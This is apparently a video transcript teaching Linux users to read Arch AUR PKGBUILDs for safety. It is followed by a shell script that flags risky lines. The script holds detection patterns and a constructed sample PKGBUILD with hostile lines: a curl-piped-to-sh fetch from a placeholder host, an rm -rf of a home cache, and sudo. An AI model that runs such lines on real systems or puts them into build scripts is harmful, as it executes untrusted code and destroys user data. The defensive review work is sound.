 We often tell Linux users that before they go and grab a script off the internet and run it on their system, they actually should open the script, the file, and actually read it, read the source code, and see exactly what it's going to do before you run it on your system, because you never know: that script, it could be something malicious. It could do something nefarious. It could actually damage your machine. So it's always a good idea, if you go and grab a script off of somebody's GitHub or their GitLab, actually read the script before you execute it. Not only that, but we have scripts that are part of package builds for our Linux distributions. For example, Arch Linux has the AUR, the Arch User Repository, and what these are, these are community-contributed package build scripts, essentially, right? And you're actually supposed to read these PKGBUILDs before you install these programs from the AUR, just to be sure that whoever put this thing in the AUR is not trying to do something crazy like install a crypto miner on your system or something like that, right? So you really are supposed to read those AUR PKGBUILDs before you install the programs. And the same can be said for Pacstall on Ubuntu. Pacstall is like an AUR for Ubuntu. It has package builds, and those package builds, the same thing: it's a script, right? It's an install script.
 You should read it just to make sure it's not going to do anything damaging to your system. Now, one of the problems with telling people to go and read these scripts before they run them is that many people, they think that they actually can't go and read the script and actually understand it. Because I get people in my comment section on YouTube, they watch my videos and I tell them, hey, go read this script before just running it on your system, and then I get comments like, "Hey DT, I can't go read this bash script and understand it. I don't know any scripting, so it's pointless for me to go and check the source code, because I wouldn't know what the hell the source code is doing anyway." I think you guys are underselling yourselves. I think many of you guys can actually read these scripts and understand what they're doing. Unless you're just a complete brand new, day-one Linux user, most of you guys can read these scripts, because, for example, these install scripts like these Arch PKGBUILDs, most of these, all they're doing is they're using like some of the basic shell functions. And by basic shell functions I mean copying files, moving files, removing files, things like that, making directories, the standard shell commands that, if you spent a few months on Linux, you probably know those commands. You probably run them yourself in the terminal. That's all these scripts are doing. So what I was going to do today is, if you're a brand new user and you think you can't read some of these AUR PKGBUILDs or whatever it happens to be, I'm actually gonna go to the AUR, and I have picked out three programs, three very popular programs that are on the AUR, and we're actually just gonna read the PKGBUILDs. I'm gonna open the PKGBUILDs and just show you what the PKGBUILD is doing, and I bet that you can kind of follow along with me and probably figure out exactly what these PKGBUILDs are doing yourself, without even needing my help.
 So let me switch over to my browser, and probably the most popular package right now on the AUR, I tried to pick very popular programs that most people have probably installed from the AUR, and the Brave browser, brave-bin. So it's a binary, meaning it doesn't have to compile, which, compiling web browsers takes hours and hours, so that's nice that whoever put Brave in the AUR actually just installs it as a pre-built binary. Now what you want to do if you're installing something from the AUR is you want to view the PKGBUILD, right? This is essentially a shell script. It's an install script, and these things are not hard to read. And if you're new to reading a bash script or a shell script, let me just scroll down. This is not very long. And we don't even need to worry about any of these lines here, because those are comments. Anything that begins with the pound symbol, the hashtag, right, that is just a comment, meaning this is not code that's actually gonna get executed. This is just comments people leave, and usually it's contributors. It's just letting you know who actually has worked on this package, and usually some contact information as well. Now, because this is not code that's gonna be executed, don't even have to worry about that. So let's just skip ahead to the rest of the script, right? And then the next section is all of these variables. These are variables because they're some name equals some value, right?
 So pkgname equals brave-bin. That's gonna be, you know, later in the script, anytime the word pkgname happens, right here, $pkgname, really that is just a substitute for brave-bin. That's all that is. So all of these are just variables. So this is not really code that's gonna be executed either, although, you know, again, these words will be substituted for their values later on in the script. But really we don't really have to focus too much on that either. So let's skip ahead to actually the functions that actually do get executed in the script, which in this case for brave-bin are just these two down here. And you can tell these are shell functions because they're a name, whatever the function name is, and then opening and closing parentheses, right? And then you have the opening and closing braces, and in between the braces is actually what the function is going to do. In this case, this is the prepare function. So what is the prepare function going to do? The very first thing it's gonna do is gonna run mkdir, make directory, -p brave, right? Now, I don't need to explain this to you if you've been using Linux and you've opened a terminal at least a few times and you know some of the basic bash commands, right? You know what mkdir is: make directory, right? It's making a directory and it's gonna call it brave. So is that a safe command? Yeah, you don't have to worry about it. The next thing is bsdtar. Now on Linux, a lot of us simply use tar rather than the bsdtar, but it doesn't matter. You know what it is. It's an archive program. So it's extracting something; it is extracting this zip file. There's gonna be a source file. So it's going and grabbing pkgname-pkgver. So pkgname-pkgver, those are variables: pkgname is brave-bin, dash 1.42.86 for the pkgver, .zip, and bsdtar is actually going to take that zip file, extract that, and get whatever it needs out of that.
 It's like it's looking for brave. And then we're gonna run chmod +x. Now most of you guys know what chmod +x is: it makes something executable, and in this case, it's making this file here, brave/brave, it's making that executable, because I guess that is the executable binary for Brave. So nothing about this prepare command, right, nothing about that prepare function is dangerous, right? And you're making a directory, we're extracting a zip file, and we're making something executable. Now the next function is a little longer. This is the package function. Now, what is it going to do? Well, first it's going to run the install command. You can think of install, it's similar to the copy command, to cp. You often see install used in PKGBUILDs rather than cp. So we're gonna run the install command on this directory, and we're gonna give it 755 for permission. The directory is going to be $pkgdir/usr/lib, and pkgdir, of course, is a variable. There are two variables in Arch Linux PKGBUILDs you need to know about: pkgdir and srcdir. Just know they're part of, when makepkg actually builds the package for you,
It creates these two directories One of them is PKG and one of them is SRC and those are and the variables for these in these scripts is package dir And source dir so if you see those those are just standard stuff You'll see in a ur scripts and we're gonna copy over this file here this brave file We're gonna copy it over to package dir slash user slash lib slash package name, which is brave Then we're gonna do another ch mod So we're gonna change the permissions for this program here And then we're gonna run some more installs the next three lines are all installs again It's essentially a copy a copy and changing the permissions at the same time is kind of what install is So it's gonna move this file to this location Then it's going to move this to this location Then it's gonna move this to this location yada yada yada nothing dangerous about any of that and at the end we have this for loop and For size in 16 by 16 24 by 24 32 by 32 yada yada yada Do this install these logos dot ping to the appropriate Location so basically brave has a bunch of icons in these sizes from 16 by 16 all the way up to 256 by 56 and that is actually part of the names of those icons So depending on the icon name it wants you to put it in the appropriate folder for each Size and that's what that for loop is doing so that's actually pretty clever Otherwise what they could have done instead of the for loop since it's six different icons They could have done six different install commands and just specifically Did one for the 16 by 16 icon one for the 24 by 24 icon yada yada yada But doing the for loop saves a little bit of typing So that is the package built for the brave binary package that's in the a you are and again Just quickly taking a look at it You know all of those commands the only command you probably wouldn't have known If you've never looked at a package build script before you probably have never used the install command, but it's a standard Core utility it's there's nothing 
 weird about that, but you can tell it's not really installing anything in any weird places, and of course, it's not doing any kind of like rm -rf. You know, it's not doing like a forced remove, which can be dangerous if a PKGBUILD is removing files and directories, because if somebody didn't know what they were doing and did an rm -rf on the wrong directory, for example, like a home directory or something like that, right, it would be very damaging to the system. But in this case, yeah, there's nothing wrong with the brave-bin PKGBUILD. Well, I picked out a couple of others because I had wanted a good cross section, because some of these may be a little bit more complicated than others. I found the Starship prompt. The Starship prompt is a shell prompt that works in bash, zsh, and fish. It's a very popular program. It's in the AUR. Let's read the PKGBUILD, and now that I've kind of talked you through it, again, we don't worry about the comments, and I'm not really worried about these variables at the top, although you can read it. Some of them are useful. For example, the source here: the source variable tells you exactly where it's pulling the source code from, so you may want to go to that GitHub and actually check out the source code on the GitHub if you really want to. But really we're worried about the functions, you know, what is actually getting executed here? I'm not going to talk you through this. The pkgver function here, it's doing a cd into a folder and then it's echoing something, which is just printing out something to the terminal. Not dangerous. We don't even have to worry about it. In the build function, we're gonna cd into a directory. No big deal, right?
 Then we're going to run cargo build. So this is a Rust program, and we're going to build it from source using cargo, which is the Rust package manager, essentially. Nothing weird about that. The check function: again, we're going to cd into a directory and then we're going to do a cargo test on it. No big deal about any of that. And then the package function: we're going to cd into the source directory slash pkgname, and then we're going to install some files and directories, you know, put them in their appropriate places. Pretty easy PKGBUILD. Now that you've seen one, you've kind of seen them all. For one last PKGBUILD, this is the DeaDBeeF music player, my favorite music player. Let's read the PKGBUILD and see what it does. Again, we're not worried about the comments and we're really not worried about these variables at the top, although if you wanted to know exactly where it's pulling the source code from, there is the source variable. What we're really interested in, of course, is the functions at the bottom here. So we have the build function here. What is it doing? Well, it's doing a cd into a directory and then it's exporting some variables for CC and CXX. So typically when you see this, this is a C program or maybe a C++ program, and it's about to compile it from source. And if you've ever compiled a C program, typically it involves three commands: ./configure, then make, and then make install, and that's exactly what's about to go on here. We have ./configure, then the make command, and in the package function, which is the next function that gets executed, we have a cd command, but the next thing is the make install. So that is all that's going on here. We're doing a configure, make, make install, and then we have the install command here that copies this file over to this target directory, and that's it. Very easy to figure out what these PKGBUILDs are, and you don't have to be a rocket scientist to figure this out, right?
 Anyone could figure this out if you've done some basic stuff at the shell, if you occasionally open up a terminal and do an ls and cd, maybe you make a directory with mkdir, or you move with mv, or cp for copy, or rm to remove files. You know, just the very basic shell commands. That's 90% of what goes on, especially in these build scripts and these install scripts on Linux. Now, having said all that, do I actually read these PKGBUILDs every time I install something from the AUR? I will tell you, nine times out of ten I don't, because I don't install a ton of stuff from the AUR. Most of the stuff I install from the AUR are really popular programs like Brave, Starship, DeaDBeeF. Those are three programs I actually have installed on all of my systems, and they're in the AUR. I knew they were in the AUR, which is why I picked those PKGBUILDs to take a look at today. But I never read those, because I know those programs are very popular. Those PKGBUILDs in the AUR, they get installed all the time. A lot of people are installing them, and if there was something wrong with them, somebody would spot it immediately. Especially Brave. Brave is probably the most popular package right now on the AUR, to probably eventually make its way to the Arch core repository. For me, typically I read PKGBUILDs for really small niche programs that not a lot of people have heard of, because I might be the only person that's ever actually installed that program from the AUR. And who knows, if nobody else has tried it before me, it could be something nefarious, something scandalous, right? So I might actually want to read that PKGBUILD. The other times that I read PKGBUILDs is when you're building stuff from the AUR, sometimes they don't compile correctly, sometimes.
 They just don't build correctly. It'll throw errors, and then typically what I'll do is I'll go into the PKGBUILD and see if I can spot any kind of error, and a lot of times I can actually correct the PKGBUILD. I can find the mistake, what's throwing the error, and I can modify the PKGBUILD to where it actually then builds correctly for me. I've actually done that several times in the past. So it is a good idea to get in the habit of reading these things, and obviously not only just reading these things for safety reasons, but also just to learn a little more, especially about some of the basic shell commands. And before I go, I need to thank the producers of this episode, and of course I'm talking about Dustin Gabe James Matt Maxim Mimit Michael Mitchell Paul West Why you ball told me Alan armored dragon Chuck commander angry dieokai Dylan Greg Marsstrom Erion Alexander Paul piece arching for door polytech reality It's for less Red Prophet Steven tools Devler and Willie. These guys, they're my highest tier patrons over on Patreon. Without these guys, this episode would not have been possible. The show is also brought to you by each and every one of these fine ladies and gentlemen, all these names you're seeing on the screen right now. These are all my supporters over on Patreon, because I don't have any corporate sponsors. I'm sponsored by you guys, the community. If you want to see more videos about Linux, free and open source software, subscribe to DistroTube over on Patreon. All right guys. Peace. I bet most AUR users have never read a PKGBUILD.
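
The read-through above, turned into a first-pass check (an added example, not part of the video): a POSIX shell function that prints the PKGBUILD lines a reviewer should stop on, starting with the `rm -rf` outside `$pkgdir`/`$srcdir` case named in the walkthrough and going beyond it to a few other constructs that have no place in a build script. The function names, the pattern list and the sample PKGBUILD are assumptions constructed for illustration, and a clean result does not replace reading the file.

```shell
#!/bin/sh
# Added example: list PKGBUILD lines worth a closer read before running makepkg.
# The pattern list is an illustrative assumption, not a complete malware check.

hit() { printf '%s\n' "$line" | grep -Eq -- "$1"; }   # does $line match ERE $1?
say() { printf '%s\n' "$n: $1: $line"; }              # report the current line

review_pkgbuild() {
    n=0
    sep='(^|[;&|[:space:]])'                           # start of a command
    while IFS= read -r line || [ -n "$line" ]; do
        n=$((n + 1))
        if hit '^[[:space:]]*(#|$)'; then continue; fi # skip comments, blanks
        if hit "${sep}rm[[:space:]]+-[a-zA-Z]*[rR]" &&
           ! hit '\$[{]?(pkgdir|srcdir)'; then
            say 'recursive rm outside $pkgdir/$srcdir'
        fi
        if hit '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh'; then say 'download piped to a shell'; fi
        if hit "${sep}(sudo|su)[[:space:]]"; then say 'privilege escalation in build'; fi
        if hit "${sep}eval[[:space:]]|base64[[:space:]]+(-d|--decode)"; then say 'dynamic or encoded code'; fi
        if hit '\$[{]?HOME|~/|/home/'; then say 'touches a home directory'; fi
    done < "$1"
}

# Constructed sample: shaped like the PKGBUILDs read above, with three lines
# added that a reviewer should question. Not a real AUR package.
write_sample() { cat > "$1" <<'EOF'
# Maintainer: Example Person <person@example.invalid>
pkgname=example-bin
pkgver=1.0.0
prepare() {
  mkdir -p example
  bsdtar -xf "$pkgname-$pkgver.zip" -C example
  chmod +x example/example
}
package() {
  install -dm0755 "$pkgdir/usr/lib"
  rm -rf "$srcdir/tmp"
  rm -rf "$HOME/.cache"
  curl -s https://example.invalid/setup.sh | sh
  sudo cp example/example /usr/local/bin/
}
EOF
}

# Usage: sh review.sh path/to/PKGBUILD
if [ "$#" -gt 0 ]; then review_pkgbuild "$1"; fi
```

On the constructed sample it reports lines 12, 13 and 14 and stays quiet on line 11, where the recursive remove is confined to `$srcdir`.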